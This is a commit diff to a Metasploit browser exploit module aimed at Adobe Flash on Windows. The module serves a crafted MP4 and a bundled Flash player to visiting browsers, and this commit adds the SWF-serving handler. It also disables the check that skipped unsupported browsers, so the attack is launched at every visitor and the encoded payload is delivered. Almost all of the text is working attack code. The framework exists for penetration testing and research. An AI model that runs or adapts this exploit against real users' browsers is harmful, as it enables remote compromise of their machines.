Test out new player code

2024-07-18 18:31:41 +02:00 · 2012-03-08 15:05:12 -06:00 · 2012-03-08 15:05:12 -06:00 · b0db18674c
commit b0db18674c
parent eb847a3dfb
2 changed files with 21 additions and 8 deletions
--- a/data/exploits/mp4player.swf
+++ b/data/exploits/mp4player.swf
--- a/modules/exploits/windows/browser/adobe_flash_sps.rb
+++ b/modules/exploits/windows/browser/adobe_flash_sps.rb
@ -69,8 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote

 			register_options(
 				[
-					OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation']),
-					OptString.new('SWF_PLAYER_URI', [true, 'Path to the SWF Player'])
+					OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
 				], self.class)
 	end

@ -94,19 +93,25 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Avoid the attack if the victim doesn't have the same setup we're targeting
 		if my_target.nil?
 			print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
-			send_not_found(cli)
-			return
+			#send_not_found(cli)
+			#return
+			my_target = targets[0]
 		end

 		# The SWF requests our MP4 trigger
 		if request.uri =~ /\.mp4$/
 			print_status("Sending MP4 to #{cli.peerhost}:#{cli.peerport}...")
-			#print_error("Sorry, not sending you the mp4 for now")
-			#send_not_found(cli)
 			send_response(cli, @mp4, {'Content-Type'=>'video/mp4'})
 			return
 		end

+		# The SWF request itself
+		if request.uri =~ /\.swf$/
+			print_status("Sending SWF to #{cli.peerhost}:#{cli.peerport}...")
+			send_response(cli, @swf, {'Content-Type'=>'flash/swf'})
+			return
+		end
+		
 		# Set payload depending on target
 		p = payload.encoded

@ -140,8 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		end

 		myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
-		mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4"
-		swf_uri = "#{datastore['SWF_PLAYER_URI']}?autostart=true&image=video.jpg&file=#{mp4_uri}"
+		swf_uri = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".swf"

 		html = %Q|
 		<html>
@ -166,8 +170,17 @@ class Metasploit3 < Msf::Exploit::Remote

 	def exploit
 		@mp4 = create_mp4
+		@swf = create_swf
 		super
 	end
+	
+	def create_swf
+		path = ::File.join( Msf::Config.install_root, "data", "exploits", "mp4player.swf" )
+		fd = ::File.open( path, "rb" )
+		swf = fd.read(fd.stat.size)
+		fd.close
+		return swf		
+	end

 	def create_mp4
 		ftypAtom = "\x00\x00\x00\x20"                   #Size